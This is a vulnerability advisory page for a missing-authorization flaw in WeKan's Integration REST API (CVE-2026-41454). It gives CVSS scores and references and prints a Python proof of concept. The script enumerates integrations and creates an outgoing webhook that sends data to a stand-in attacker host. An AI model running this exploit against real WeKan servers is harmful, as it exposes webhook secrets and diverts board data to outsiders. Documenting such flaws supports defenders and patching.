Security Vulnerability Report
CVE-2026-41454 CVSS 8.3 HIGH

Published: 2026-04-22 22:16:32
Last Modified: 2026-04-23 16:27:12

Description

WeKan before 8.35 contains a missing authorization vulnerability in the Integration REST API endpoints that allows authenticated board members to perform administrative actions without proper privilege verification. Attackers can enumerate integrations including webhook URLs, create new integrations, modify or delete existing integrations, and manage integration activities by exploiting insufficient authorization checks in the JsonRoutes REST handlers.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

WeKan < 8.35

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://target-wekan-instance.com/api/integrations"

# Attacker's session cookie (obtained after logging in as a low-privileged board member)
session_cookie = {
    "wekan-sid": "valid_low_privileged_session_id"
}


# 1. Enumerate existing integrations (Information Disclosure)
def enumerate_integrations():
    response = requests.get(target_url, cookies=session_cookie)
    if response.status_code == 200:
        print("[+] Successfully enumerated integrations:")
        print(response.json())
    else:
        print("[-] Failed to enumerate integrations.")


# 2. Create a malicious integration (Integrity Impact)
def create_malicious_integration():
    payload = {
        "type": "outgoing-webhook",
        "url": "http://attacker-controlled.com/steal",
        "boardId": "target_board_id"
    }
    # Note: The endpoint might vary based on the specific JsonRoutes implementation
    create_url = target_url
    response = requests.post(create_url, json=payload, cookies=session_cookie)
    if response.status_code == 200:
        print("[+] Successfully created malicious integration.")
    else:
        print(f"[-] Failed to create integration. Status: {response.status_code}")


if __name__ == "__main__":
    enumerate_integrations()
    create_malicious_integration()

References

https://github.com/wekan/wekan/commit/2cd702f48df2b8aef0e7381685f8e089986a18a4
https://github.com/wekan/wekan/releases/tag/v8.35
https://www.vulncheck.com/advisories/wekan-missing-authorization-via-integration-rest-api

Additional Record Data

Weakness: CWE-862 (Missing Authorization)
Record Status: Deferred
CVSS 4.0 (Secondary): 8.7 HIGH
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 3.1 Exploitability Score: 2.8
CVSS 3.1 Impact Score: 5.5